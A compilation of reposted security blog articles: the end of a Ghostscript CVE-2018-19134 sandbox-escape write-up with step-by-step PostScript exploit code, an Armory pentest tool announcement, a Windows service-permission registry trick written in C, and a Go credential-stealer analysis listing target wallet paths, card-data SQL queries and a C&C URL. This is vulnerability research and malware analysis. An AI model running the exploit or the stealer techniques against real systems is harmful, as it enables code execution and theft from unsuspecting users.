Indeed, I can now call the zget and zput C functions directly, instead of uses_base_space and get_pattern. So I can now call functions that I could already call from PostScript anyway, so what did I gain? The point here is that I also control the arguments to these functions, in C. When the underlying C function is called from PostScript, an execution context is passed to the C function as its argument. This context, represented by the type i_ctx_t (alias of gs_context_state_s — they do like their typedefs!), contains a lot of information that cannot be controlled from PostScript, among which are important security settings such as LockFilePermissions:

struct gs_context_state_s {
    ...
    bool LockFilePermissions; /* accessed from userparams */
    ...
    /* Put the stacks at the end to minimize other offsets. */
    dict_stack_t dict_stack;
    exec_stack_t exec_stack;
    op_stack_t op_stack;
    struct i_plugin_holder_s *plugin_list;
};

When calling operators from PostScript, the arguments passed to the operator are stored in op_stack. By calling these functions from C directly and having control of the argument i_ctx_p, we'll be able to call functions as if Ghostscript is running without -dSAFER mode switched on.
So let's try to create a PostScript array to fake the context i_ctx_t object. PostScript function arguments are stored in i_ctx_p->op_stack.stack.p, which is a ref pointer that points to the argument. In order to call PostScript functions with a fake context, I'll need to control p. The offset of p from i_ctx_p here is actually the same as the offset of op_stack, which is 0x270. As each ref is of size 0x10, this corresponds to the 39th element in the fake reference array.

As seen from the diagram, this alignment is not ideal. The op_stack.stack.p corresponds to the tas part of my array, which I don't control completely. If only op_stack corresponded to a value field of a ref, then I would have succeeded. What's more, tas stores metadata of a ref, so even if I had full control of it, I wouldn't be able to set it to the address of an arbitrary object without first knowing its address. As most PostScript functions dereference the operand pointer, any exploit will most likely just crash Ghostscript at this point. This looks like a show-stopper.

Getting arbitrary read and write primitives

The idea now is to find a PostScript function that:

Does not dereference the osp (op_stack.stack.p) pointer;
Still does something "useful" to osp;
Is available in SAFER mode.

Stack operators come to mind. The pop operator is particularly interesting:

zpop(i_ctx_t *i_ctx_p)
{
    os_ptr op = osp;

    check_op(1);
    pop(1);
    return 0;
}

It checks the value of the stack pointer against the bottom of the stack with check_op, which compares osp against the pointer osbot. If osp is greater than osbot, it then decreases the value of osp. It is a simple function that does not dereference osp, and it changes its value. To see what I can gain from this, let's take a closer look at the structure of ref and op_stack side by side. Recall that in our fake object, op_stack is faked by the 39th element of a ref array, which is a ref.
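The index arithmetic is easy to sanity-check: with 16-byte refs, the element of the fake array that overlays a given i_ctx_t field is simply its byte offset divided by 0x10. A throwaway check of my own, using the 0x270 offset quoted above (which of course varies between builds):

```python
REF_SIZE = 0x10          # sizeof(ref): 8-byte tas + 8-byte value
OP_STACK_OFFSET = 0x270  # offset of op_stack in gs_context_state_s (per the post)

def overlaying_element(field_offset, ref_size=REF_SIZE):
    # Index of the fake-array element whose start overlays the given field.
    return field_offset // ref_size

assert overlaying_element(OP_STACK_OFFSET) == 39  # the 39th element
# 0x270 is a multiple of 16, so the field lines up with the start of that
# ref, i.e. with its tas header rather than the fully-controlled value field.
assert OP_STACK_OFFSET % REF_SIZE == 0
```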
As you can see in the image above, the field tas corresponds to p, while value corresponds to osbot. In particular, the three fields type_attrs, _pad and rsize combine to form the pointer p in op_stack. As explained before, type_attrs specifies the type of the ref object, as well as its accessibility. So by using pop, I can modify both the type and accessibility of an object of my choice!

One catch though: pop only works if p is larger than osbot, which is the address of this ref object. So in order for this to work, the object that I am tampering with needs to be a string, array or dictionary that is large enough, so that rsize, which gives the top bytes of p, will combine with the others to give something that is greater than the pointer address of most ref objects. This prevents me from just modifying the accessibility of built-in read-only objects like systemdict to gain write access. Still, there are at least a couple of things that I can do:

I can "convert" an array into a string this way, which will then treat the internal ref array as a byte array (i.e. the ref pointer in the value field of this array is now treated as a byte buffer). This allows me to read/write the in-memory representation of any object that I put into the array. This is very powerful, as strings in PostScript are not terminated by a null character, but rather treated as a byte buffer of length specified by rsize, so any byte in the buffer can be read or written. Note that this does not give me any out-of-bounds (OOB) read/write, as the resulting string will have the same length as the original array; but since each ref is 16 bytes, the resulting byte buffer will only cover about 1/16 of the buffer originally allocated for the ref array. This is what I'm going to do in the exploit.

I can of course do it the other way round and "convert" a string into an array of the same length.
As explained above, the resulting ref array will be about 16 times larger than the original string, which allows me to do OOB read and write. I have not pursued this route.

There is one more technical difficulty that I need to overcome. The fake object pinst actually calls two functions, with the output of one feeding into the other:

return pinst->type->procs.uses_base_space(
    pinst->type->procs.get_pattern(pinst)
);

As seen from above, uses_base_space takes the return value of pinst->type->procs.get_pattern(pinst), which is now zpop(pinst), as an input. As zpop returns 0, this is likely to cause a null pointer dereference when I use any built-in PostScript operator in place of uses_base_space, unless I can find an operator that doesn't even use the context pointer i_ctx_p at all. If only there existed a query language I could use to find particular patterns in a code base! Here's the QL query I used to find the operator I was looking for:

from Function f
where f.getName().matches("z%") and
  f.getFile().getAbsolutePath().matches("%/psi/%") and
  // Look for functions with a single parameter of the right type:
  f.getNumberOfParameters() = 1 and
  f.getParameter(0).getType().hasName("i_ctx_t *") and
  // Make sure the function is actually defined:
  exists(Stmt stmt | stmt.getEnclosingFunction() = f) and
  // And doesn't access `i_ctx_p`
  not exists(FieldAccess fa, Function f2 |
    fa.getQualifier().getType().hasName("i_ctx_t *") and
    fa.getEnclosingFunction() = f2 and
    f.calls*(f2)
  )
  // And doesn't dereference `i_ctx_p`
  and not exists(PointerDereferenceExpr expr, Variable v, Function f2 |
    expr.getAnOperand() = v.getAnAccess() and
    v.getType().hasName("i_ctx_t *") and
    expr.getEnclosingFunction() = f2 and
    f.calls*(f2)
  )
select f

My QL query uses some heuristics to identify PostScript operators: their names normally start with z, they are defined inside the psi directory, and they take an argument of type i_ctx_t *.
I then look for functions that do not dereference the argument nor access its fields, either in the function itself or in functions that it calls. This query does not look for dereferences of the parameter i_ctx_p in particular, but of any variable of type i_ctx_t *, which is a good enough approximation.

You can run your own QL queries on over 130,000 GitHub, Bitbucket, and GitLab projects at LGTM.com. You can use either the online query console, or you can install the QL for Eclipse plugin and run queries locally on a code snapshot (downloadable from the repo's project page on LGTM). Ghostscript is not developed on GitHub, Bitbucket, or GitLab, so it has not been analyzed by LGTM.com. But you can download a Ghostscript code snapshot here.

This query gives me 6 results. The function ucache seems to be just what we need. Let's try to put this together and see if it works. First set up the fake object pinst:

%Create the fake array pinst
/pinst 100 array def
%array that stores the pop-ucache gadget
/pop_ucache 100 array def
%put pop into pop_ucache to cause more type confusions by decrementing osp
systemdict /pop get pop_ucache exch 1 exch put
%put ucache in (no op) to avoid crash
systemdict /ucache get pop_ucache exch 0 exch put
%replace the functions with pop and ucache
pinst 1 pop_ucache put

Now we need to create a large array object and store it in the 39th element of pinst. Its metadata tas will then be interpreted as the stack pointer address osp. I'll use the PostScript operator put as its first element, then use pop to change its type to string and read off the address of the zput function.
%make a large enough array and change its type with pop
/arr 32767 array def
%get the address of the put operator
systemdict /put get arr exch 0 exch put
%store arr as 39th element of pinst and modify its type
pinst 39 arr put
%Create the argument to setpattern
/impl 100 dict def
impl /Implementation [pinst] put
%Change type of arr to string
0 1 1291 {impl setpattern} for
%Print the address of zput as string
pinst 39 get 8 8 getinterval

It is a bit unfortunate that the type_attrs value for array is 0x4 while the value for string is 0x12, so I have to underflow the ushort to go from array to string, which is why I have to run impl setpattern 1291 times. As can be seen in the screenshot above, the fake array gets converted into a string and I get the address of zput. I actually have to run it outside of gdb, or at least enable address randomization, to get it to work, as gdb seems to always allocate arr at 0x7ffff0a35078; with memory randomization, the above has not failed me a single time. I can also use this to write bytes to any position in arr.

Sandbox bypass

Now that I can read and write arbitrary bytes from an arbitrary PostScript object, it is just a matter of deciding what is the easiest thing to do. My original plan was to simply overwrite the LockFilePermissions parameter, and then call file, which would allow arbitrary command execution, like I did with CVE-2018-19475. However, it turns out that in order for this to work, I would also need to fake a number of other objects in the execution context i_ctx_p, which seems too complicated. Instead, I'm just going to call a simple but powerful function that I am not supposed to have access to in SAFER mode, then use it to overwrite some security settings, which will then allow me to run arbitrary shell commands. The operator forceput (also used by Tavis Ormandy in one of his Ghostscript vulnerabilities) fits the bill nicely.
Summarizing, here is what I need to do now:

1. Create a fake operand stack with the arguments that I want to supply to forceput;
2. Overwrite the location in pinst that stores the address of the operand stack pointer with the address of what I created above;
3. Get the address of forceput and replace pinst->type->procs.get_pattern with it.

To achieve (1), recall that the operand stack is nothing more than an array of ref. To fake it, I just need to create an array with my arguments:

/operand 3 array def
operand 0 userparams put
operand 1 /LockFilePermissions put
operand 2 false put

I can then store it in arr to retrieve the address of this array. Instead of using arr, I'm just going to reuse pinst and put it in the 31st element instead:

pinst 31 operand 2 1 getinterval put

Note that instead of putting operand into the 31st element of pinst, I create a new array starting from operand[2] and use that new array. This is because PostScript functions look for their arguments by going down the operand stack, so I need to set it up so that when osp decreases, it will get my other arguments. Using the trick in the previous section, I can now read off the address of this fake stack pointer and write it to the appropriate location in pinst. This then sets up pinst for calling forceput.

Although forceput is not accessible from SAFER mode, I can simply take the address of zput and add the offset to zforceput to obtain the address of zforceput (as this offset is not randomized). In the debug binary compiled with commit 81f3d1e, this offset is 0x437; in the release binary compiled with the same commit, or in the release code of 9.25, this offset is 0x4B0. After doing this, I can simply call restore to write the new LockFilePermissions parameter to the current device, and then run an arbitrary shell command (again, remember to turn address randomization ON).
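The pointer arithmetic of the leak-and-offset chain can be modeled in a few lines of Python (illustrative only: the zput address below is invented, and 0x4B0 is the release-build offset quoted above):

```python
import struct

ZPUT_TO_ZFORCEPUT = 0x4B0        # release-build offset quoted in the post
zput_addr = 0x7F0123456000       # hypothetical leaked address of zput

# Element 0 of the type-flipped fake array, as raw bytes: tas header
# (type_attrs, _pad, rsize) followed by the 8-byte value holding the pointer.
ref0 = struct.pack("<HHIQ", 0x0012, 0, 8, zput_addr)

# "pinst 39 get 8 8 getinterval": take the 8 bytes at offset 8.
leaked = struct.unpack_from("<Q", ref0, 8)[0]
assert leaked == zput_addr

# zforceput sits at a fixed (non-randomized) delta from zput.
zforceput_addr = leaked + ZPUT_TO_ZFORCEPUT
assert zforceput_addr == 0x7F01234564B0
```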
Here's a screenshot of the launching of a calculator from sandboxed Ghostscript: By overwriting other entries in userparams, such as PermitFileReading and PermitFileWriting, it is also possible to gain arbitrary file access. Systems like AppArmor may be effective at preventing PDF viewers from starting arbitrary shell commands, but they don't stop a specially-crafted PDF file from wiping a user's entire home directory when opened. Or, if you're in a more forgiving mood, you could delete all files from a user's desktop and subsequently flood it with Super Mario bricks: https://youtube.com/watch?v=5vVxN-vfCsI For more videos about our security research and exploits, please visit the Semmle YouTube channel. If you'd like to run your own QL queries on open source software: you can! We've made our QL technology freely available for running queries on open source projects that have been analyzed by LGTM.com. At the time of writing, LGTM.com has analyzed around 130,000 GitHub, Bitbucket, and GitLab repositories. For each of these projects, you can download a code snapshot from LGTM.com for running queries. In addition, you'll need the QL for Eclipse plugin. Unfortunately Ghostscript is not developed on GitHub.com and has therefore not been analyzed by LGTM.com. We've therefore made the Ghostscript code snapshot available here. Sursa: https://lgtm.com/blog/ghostscript_CVE-2018-19134_exploit?
5. Introducing Armory: External Pentesting Like a Boss

Posted by Dan Lawson on February 04, 2019

TLDR; We are introducing Armory, a tool that adds a database backend to dozens of popular external and discovery tools. This allows you to run the tools directly from Armory, automatically ingest the results back into the database, and use the new data to supply targets for other tools.

Why?

Over the past few years I've spent a lot of time conducting some relatively large-scale external penetration tests. This ends up being a massive exercise in managing various text files, with a moderately unhealthy dose of grep, cut, sed, and sort. It gets even more interesting as you discover new domains, new IP ranges or other new assets and must start the entire process over again. Long story short, I realized that if I could automate handling the data, my time would be freed up for actual testing and exploitation. So, Armory was born.

What?

Armory is written in Python. It works with both Python2 and Python3. It is composed of the main application, as well as modules and reports. Modules are wrapper scripts that run public (or private) tools using either data from the command line or data in the database. The results are then either processed and imported into the database or just left in their text files for manual perusal. The database handles the following types of data:

BaseDomains: Base domain names, mainly used in domain enumeration tools
Domains: All discovered domains (and subdomains)
IPs: IP addresses discovered
CIDRs: CIDRs, along with their owners, that the discovered IP addresses reside in, pulled from whois data
ScopeCIDRs: CIDRs that are explicitly added as in scope. This is separated out from CIDRs since many times whois servers will return much larger CIDRs than may belong to a target/customer.
Ports: Port numbers and services, usually populated by Nmap, Nessus, or Shodan
Users: Users discovered via various means (leaked cred databases, LinkedIn, etc.)
Creds: Sets of credentials discovered

Additionally, with BaseDomains, Domains and IPs you have two types of scoping:

Active scope: Host is in scope and can have bad-touch tools run on it (i.e. nmap, gobuster, etc.).
Passive scope: Host isn't directly in scope but can have enumeration tools run against it (i.e. aquatone, sublist3r, etc.).

If something is Active scoped, it should also be Passive scoped. The main purpose of Passive scoping is to handle situations where you may want data ingested into the database, and the data may be useful to your customers, but you do not want to actively attack those targets. Take the following scenario:

You are doing discovery and an external penetration test for a client trying to find out all of their assets. You find a few dozen random domains registered to that client, but you are explicitly scoped to the subnets that they own. During the subdomain enumeration, you discover multiple development web servers hosted on Digital Ocean. Since you do not have permission to test against Digital Ocean, you don't want to actively attack it. However, this would still be valuable information for the client to receive. Therefore you can leave those hosts scoped Passive and you will not run any active tools on them. You can still generate reports later on including the passive hosts, thereby still capturing the data without breaking scope.

Detalii complete: https://depthsecurity.com/blog/introducing-armory-external-pentesting-like-a-boss
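As a toy illustration of the scoping rule described above ("Active implies Passive"), here is a sketch of my own, not Armory's actual schema:

```python
from dataclasses import dataclass

@dataclass
class Host:
    name: str
    passive: bool = False
    active: bool = False

    def __post_init__(self):
        # Armory's rule: anything Active scoped is also Passive scoped.
        if self.active:
            self.passive = True

def targets(hosts, active_only):
    # active_only=True  -> hosts safe for "bad-touch" tools (nmap, gobuster);
    # active_only=False -> hosts eligible for passive enumeration as well.
    return [h.name for h in hosts if (h.active if active_only else h.passive)]

hosts = [
    Host("app.client.example", active=True),    # inside the scoped subnets
    Host("dev.droplet.example", passive=True),  # Digital Ocean: report-only
    Host("unrelated.example"),                  # out of scope entirely
]
assert targets(hosts, active_only=True) == ["app.client.example"]
assert targets(hosts, active_only=False) == ["app.client.example", "dev.droplet.example"]
```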
6. Demystifying Windows Service “permissions” configuration

Posted on February 7, 2019

Some days ago, I was reflecting on the SeRestorePrivilege and wondering if a user with this privilege could alter a service's access rights, for example: grant everyone the right to stop/start the service during a “restore” task. (Don't expect some cool bypass or exploit here.)

As you probably know, each object in Windows has DACLs and SACLs which can be configured. The most “intuitive” are obviously file and folder permissions, but there are plenty of other securable objects: https://docs.microsoft.com/en-us/windows/desktop/secauthz/securable-objects

Given that our goal is service permissions, first we will try to understand how they work and how we can manipulate them. Service security can be split into 2 parts:

Access Rights for the Service Control Manager
Access Rights for a Service

We will focus on the Access Rights for a Service, which determine who can start/stop/pause the service and so on. For a detailed explanation, take a look at this article from Microsoft: https://docs.microsoft.com/it-it/windows/desktop/Services/service-security-and-access-rights

How can we change the service security settings?

Configuring service security and access rights is not as immediate a task as, for example, changing the DACLs of file or folder objects. Keep also in mind that it is limited to privileged users like Administrators and the SYSTEM account. There are some built-in and third-party tools which permit changing the DACLs of a service, for example:

Windows “sc.exe”. This program has a lot of options, and with “sdset” it is possible to modify the security settings of a service, but you have to specify them in the cryptic SDDL (Security Descriptor Definition Language). The opposite command, “sdshow”, will list the SDDL. Note that the interactive user (IU) cannot start or stop the BITS service because the necessary rights (RP, WP) are missing.
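A claim like that can be checked mechanically: an SDDL ACE has the shape (type;flags;rights;object_guid;inherit_guid;sid), where the rights field is a run of two-character codes (for services, RP maps to start and WP to stop, per Microsoft's documentation). A minimal, illustrative parser of my own; the sample SDDL string below is hypothetical, not the real BITS descriptor:

```python
import re

ACE_RE = re.compile(r"\(([^)]*)\)")

def parse_aces(sddl):
    # An ACE looks like (type;flags;rights;object_guid;inherit_guid;sid);
    # the rights field is a run of two-character codes.
    aces = []
    for body in ACE_RE.findall(sddl):
        ace_type, _flags, rights, _obj, _inh, sid = body.split(";")
        codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append({"type": ace_type, "sid": sid, "rights": codes})
    return aces

# Hypothetical service descriptor: SYSTEM (SY) may start/stop (RP/WP),
# while the interactive user (IU) may only query/interrogate.
sddl = "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCLCSWLOCRRC;;;IU)"
rights_by_sid = {a["sid"]: a["rights"] for a in parse_aces(sddl)}
assert "RP" in rights_by_sid["SY"] and "WP" in rights_by_sid["SY"]
assert "RP" not in rights_by_sid["IU"] and "WP" not in rights_by_sid["IU"]
```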
I'm not going to explain this stuff in depth; if interested, look here: https://support.microsoft.com/en-us/help/914392/best-practices-and-guidance-for-writers-of-service-discretionary-acces

subinacl.exe from the Windows Resource Kit. This one is much easier to use. In this example we will grant everyone the right to start BITS (the Background Intelligent Transfer Service).

Service Security Editor, a free GUI utility to set permissions for any Windows service.

And of course, via Group Policy, PowerShell, etc.

All these tools and utilities rely on this Windows API call, accessible only to highly privileged users:

BOOL SetServiceObjectSecurity(
    SC_HANDLE            hService,
    SECURITY_INFORMATION dwSecurityInformation,
    PSECURITY_DESCRIPTOR lpSecurityDescriptor
);

Where are the service security settings stored?

Good question! First of all, we have to keep in mind that services have a “default” configuration: Administrators have full control, standard users can only interrogate the service, etc. Services with a non-default configuration have their settings stored in the registry under this subkey:

HKLM\System\CurrentControlSet\Services\<servicename>\security

This subkey hosts a REG_BINARY value containing the binary form of the security settings. These “non-default” registry settings are read when the Service Control Manager starts (upon boot) and stored in memory. If we change the service security settings with one of the tools mentioned before, the changes are immediately applied and stored in memory. During the shutdown process, the new registry values are written.

And the Restore Privilege? You got it!
With the SeRestorePrivilege, even if we cannot use the SetServiceObjectSecurity API call, we can restore registry keys, including the security subkey…

Let's make an example: we want to grant everyone full control over the BITS service. On our Windows test machine, we just modify the settings with one of the tools. After that, we restart our box and copy the new binary value of the security key. Now that we have the right values, we just need to “restore” the security key with them. For this purpose we are going to use a small C program; here is the relevant part:

byte data[] = {
    0x01, 0x00, 0x14, 0x80, 0xa4, 0x00, 0x00, 0x00, 0xb4, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00,
    0x34, 0x00, 0x00, 0x00, 0x02, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0xc0, 0x18, 0x00,
    0x00, 0x00, 0x0c, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00,
    0x20, 0x02, 0x00, 0x00, 0x02, 0x00, 0x70, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x02, 0x14, 0x00,
    0xff, 0x01, 0x0f, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x12, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x18, 0x00, 0xff, 0x01, 0x0f, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05,
    0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0xff, 0x01, 0x0f, 0x00,
    0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00,
    0x8d, 0x01, 0x02, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x04, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x14, 0x00, 0x8d, 0x01, 0x02, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05,
    0x06, 0x00, 0x00, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00,
    0x20, 0x02, 0x00, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00,
    0x20, 0x02, 0x00, 0x00
};

LSTATUS stat = RegCreateKeyExA(
    HKEY_LOCAL_MACHINE,
    "SYSTEM\\CurrentControlSet\\Services\\BITS\\Security",
    0, NULL, REG_OPTION_BACKUP_RESTORE, KEY_SET_VALUE, NULL, &hk, NULL);

stat = RegSetValueExA(hk, "security", 0, REG_BINARY, (const
BYTE*)data, sizeof(data));
if (stat != ERROR_SUCCESS) {
    printf("[-] Failed writing! (%ld)\n", (long)stat);
    exit(EXIT_FAILURE);
}
printf("Setting registry OK\n");

We need, of course, to enable the SE_RESTORE_NAME privilege in our process token beforehand. In an elevated shell, we execute the binary on the victim machine, and after the reboot we are able to start BITS even with a low-privileged user.

And the Take Ownership Privilege?

The concept is the same: we first need to take ownership of the registry key, grant the necessary access rights on the key (SetNamedSecurityInfo() API calls) and then do the same trick we have seen before. But wait, one moment! What if we take ownership of the service itself?

dwRes = SetNamedSecurityInfoW(
    pszService,
    SE_SERVICE,
    OWNER_SECURITY_INFORMATION,
    takeownerboss_sid,
    NULL, NULL, NULL);

Yes, this works, but when we set the permissions on the object (again with SetNamedSecurityInfo) we get an error. If we do this with admin rights, it works… Probably the function calls the underlying SetServiceObjectSecurity, which modifies the permissions of the service stored “in memory”, and this is precluded to non-admins.

Final thoughts

So we were able to change the service access rights with our “restoreboss” user. Nothing really useful, I think, but sometimes it's just fun to try to understand some parts of Windows' internal mechanisms. Do you agree?

Sursa: https://decoder.cloud/2019/02/07/demystifying-windows-service-permissions-configuration/
7. Analyzing a new stealer written in Golang

Posted: January 30, 2019 by hasherezade

Golang (Go) is a relatively new programming language, and it is not common to find malware written in it. However, new variants written in Go are slowly emerging, presenting a challenge to malware analysts. Applications written in this language are bulky and look much different under a debugger from those that are compiled in other languages, such as C/C++.

Recently, a new variant of the Zebrocy malware was observed that was written in Go (detailed analysis available here). We captured another type of malware written in Go in our lab. This time, it was a pretty simple stealer, detected by Malwarebytes as Trojan.CryptoStealer.Go. This post will provide detail on its functionality, but also show methods and tools that can be applied to analyze other malware written in Go.

Analyzed sample

This stealer is detected by Malwarebytes as Trojan.CryptoStealer.Go:

992ed9c632eb43399a32e13b9f19b769c73d07002d16821dde07daa231109432
513224149cd6f619ddeec7e0c00f81b55210140707d78d0e8482b38b9297fc8f
941330c6be0af1eb94741804ffa3522a68265f9ff6c8fd6bcf1efb063cb61196 – HyperCheats.rar (original package)
3fcd17aa60f1a70ba53fa89860da3371a1f8de862855b4d1e5d0eb8411e19adf – HyperCheats.exe (UPX packed)
0bf24e0bc69f310c0119fc199c8938773cdede9d1ca6ba7ac7fea5c863e0f099 – unpacked

Behavioral analysis

Under the hood, Golang calls the Windows API, and we can trace the calls using typical tools, for example, PIN tracers.
We see that the malware searches for files under the following paths:

"C:\Users\tester\AppData\Local\Uran\User Data\"
"C:\Users\tester\AppData\Local\Amigo\User\User Data\"
"C:\Users\tester\AppData\Local\Torch\User Data\"
"C:\Users\tester\AppData\Local\Chromium\User Data\"
"C:\Users\tester\AppData\Local\Nichrome\User Data\"
"C:\Users\tester\AppData\Local\Google\Chrome\User Data\"
"C:\Users\tester\AppData\Local\360Browser\Browser\User Data\"
"C:\Users\tester\AppData\Local\Maxthon3\User Data\"
"C:\Users\tester\AppData\Local\Comodo\User Data\"
"C:\Users\tester\AppData\Local\CocCoc\Browser\User Data\"
"C:\Users\tester\AppData\Local\Vivaldi\User Data\"
"C:\Users\tester\AppData\Roaming\Opera Software\"
"C:\Users\tester\AppData\Local\Kometa\User Data\"
"C:\Users\tester\AppData\Local\Comodo\Dragon\User Data\"
"C:\Users\tester\AppData\Local\Sputnik\Sputnik\User Data\"
"C:\Users\tester\AppData\Local\Google (x86)\Chrome\User Data\"
"C:\Users\tester\AppData\Local\Orbitum\User Data\"
"C:\Users\tester\AppData\Local\Yandex\YandexBrowser\User Data\"
"C:\Users\tester\AppData\Local\K-Melon\User Data\"

Those paths point to data stored by browsers. One interesting fact is that one of the paths points to the Yandex browser, which is popular mainly in Russia. The next searched path is the desktop:

"C:\Users\tester\Desktop\*"

All files found there are copied to a folder created in %APPDATA%. The folder “Desktop” contains all the TXT files copied from the Desktop and its sub-folders. After the search is completed, the files are zipped, and we can see the package being sent to the C&C (cu23880.tmweb.ru/landing.php).

Golang-compiled binaries are usually big, so it's no surprise that the sample has been packed with UPX to minimize its size. We can unpack it easily with the standard UPX. As a result, we get a plain Go binary.
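As an aside for defenders, the path list above makes quick triage scripting easy. A sketch of my own (abbreviated suffix list, hypothetical helper names) that checks which targeted profile directories exist under a given %LOCALAPPDATA%:

```python
import ntpath

# Abbreviated %LOCALAPPDATA% suffixes taken from the traced path list above
# ("tester" in the trace is just the sandbox user name).
SUFFIXES = [
    r"Google\Chrome\User Data",
    r"Yandex\YandexBrowser\User Data",
    r"Chromium\User Data",
    r"Torch\User Data",
]

def present_profiles(local_appdata, exists):
    # Return the targeted profile directories that actually exist.
    return [s for s in SUFFIXES if exists(ntpath.join(local_appdata, s))]

# Demo with a stubbed filesystem so it runs anywhere; on a real Windows
# host you would pass os.path.isdir and os.environ["LOCALAPPDATA"].
fake_fs = {r"C:\Users\x\AppData\Local\Torch\User Data"}
hits = present_profiles(r"C:\Users\x\AppData\Local", exists=lambda p: p in fake_fs)
assert hits == [r"Torch\User Data"]
```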
The export table reveals the compilation path and some other interesting functions. Looking at those exports, we can get an idea of the static libraries used inside. Many of those functions (trampoline-related) can be found in the module go-sqlite3: https://github.com/mattn/go-sqlite3/blob/master/callback.go. The function crosscall2 comes from the Go runtime, and it is related to calling Go from C/C++ applications (https://golang.org/src/cmd/cgo/out.go).

Tools

For the analysis, I used IDA Pro along with the IDAGolangHelper scripts written by George Zaytsev. First, the Go executable has to be loaded into IDA. Then, we can run the script from the menu (File –> Script file). We then see a menu giving access to particular features. First, we need to determine the Golang version (the script offers some helpful heuristics); in this case, it will be Go 1.2. Then, we can rename functions and add standard Go types. After completing those operations, the code looks much more readable. Below, you can see the view of the functions before (only the exported functions are named) and after (most of the functions have their names automatically resolved and added) using the scripts.

Many of those functions come from statically-linked libraries, so we need to focus primarily on functions annotated as main_* – those are specific to the particular executable.

Code overview

In the function main_init, we can see the modules that will be used in the application. It is statically linked with the following modules:

GRequests (https://github.com/levigross/grequests)
go-sqlite3 (https://github.com/mattn/go-sqlite3)
try (https://github.com/manucorporat/try)

Analyzing this function can help us predict the functionality; i.e., looking at the above libraries, we can see that the malware will be communicating over the network, reading SQLite3 databases, and throwing exceptions. Other initializers suggest the use of regular expressions, the zip format, and reading environment variables.
This function is also responsible for initializing and mapping strings. We can see that some of them are first base64 decoded: In the string initializers, we see references to cryptocurrency wallets. Ethereum: Monero: The main function of a Golang binary is annotated "main_main". Here, we can see that the application is creating a new directory (using the function os.Mkdir). This is the directory where the found files will be copied. After that, several Goroutines are started using runtime.newproc. (Goroutines can be used similarly to threads, but they are managed differently. More details can be found here.) Those routines are responsible for searching for the files. Meanwhile, the SQLite module is used to parse the databases in order to steal data. Then, the malware zips it all into one package, and finally, the package is uploaded to the C&C.

What was stolen?

To see exactly which data the attacker is interested in, we can look more closely at the functions that perform SQL queries, and at the related strings. Strings in Golang are stored in bulk, in concatenated form: Later, a single chunk from such a bulk is retrieved on demand. Therefore, seeing from which place in the code each string was referenced is not so easy. Below is a fragment of the code where an "sqlite3" database is opened (a string of length 7 was retrieved): Another example: This query was retrieved from the full chunk of strings, by the given offset and length: Let's take a look at which data those queries were trying to fetch. 
Fetching the strings referenced by the calls, we can retrieve and list all of them:

select name_on_card, expiration_month, expiration_year, card_number_encrypted, billing_address_id FROM credit_cards
select * FROM autofill_profiles
select email FROM autofill_profile_emails
select number FROM autofill_profile_phone
select first_name, middle_name, last_name, full_name FROM autofill_profile_names

We can see that the browser's cookie database is queried in search of data related to online transactions: credit card numbers and expiration dates, as well as personal data such as names and email addresses. The paths to all the files being searched are stored as base64 strings. Many of them are related to cryptocurrency wallets, but we can also find references to the Telegram messenger.

Software\\Classes\\tdesktop.tg\\shell\\open\\command
\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\
\\AppData\\Roaming\\Electrum\\wallets\\default_wallet
\\AppData\\Local\\Torch\\User Data\\
\\AppData\\Local\\Uran\\User Data\\
\\AppData\\Roaming\\Opera Software\\
\\AppData\\Local\\Comodo\\User Data\\
\\AppData\\Local\\Chromium\\User Data\\
\\AppData\\Local\\Chromodo\\User Data\\
\\AppData\\Local\\Kometa\\User Data\\
\\AppData\\Local\\K-Melon\\User Data\\
\\AppData\\Local\\Orbitum\\User Data\\
\\AppData\\Local\\Maxthon3\\User Data\\
\\AppData\\Local\\Nichrome\\User Data\\
\\AppData\\Local\\Vivaldi\\User Data\\
\\AppData\\Roaming\\BBQCoin\\wallet.dat
\\AppData\\Roaming\\Bitcoin\\wallet.dat
\\AppData\\Roaming\\Ethereum\\keystore
\\AppData\\Roaming\\Exodus\\seed.seco
\\AppData\\Roaming\\Franko\\wallet.dat
\\AppData\\Roaming\\IOCoin\\wallet.dat
\\AppData\\Roaming\\Ixcoin\\wallet.dat
\\AppData\\Roaming\\Mincoin\\wallet.dat
\\AppData\\Roaming\\YACoin\\wallet.dat
\\AppData\\Roaming\\Zcash\\wallet.dat
\\AppData\\Roaming\\devcoin\\wallet.dat

Big but unsophisticated malware

Some of the concepts used in this malware remind us of other stealers, such as Evrial, PredatorTheThief, and Vidar. 
It has similar targets, and it also sends the stolen data as a ZIP file to the C&C. However, there is no proof that the author of this stealer is linked to those cases. When we take a look at the implementation as well as the functionality of this malware, it's rather simple. Its big size comes from the many statically compiled modules. Possibly, this malware is in the early stages of development; its author may have just started learning Go and is experimenting. We will be keeping an eye on its development. At first, analyzing a Golang-compiled application might feel overwhelming because of its huge codebase and unfamiliar structure. But with the help of proper tools, security researchers can easily navigate this labyrinth, as all the functions are labeled. Since Golang is a relatively new programming language, we can expect the tools for analyzing it to mature with time. Is malware written in Go an emerging trend in threat development? It's a little too soon to tell. But we do know that awareness of malware written in new languages is important for our community. Sursa: https://blog.malwarebytes.com/threat-analysis/2019/01/analyzing-new-stealer-written-golang/
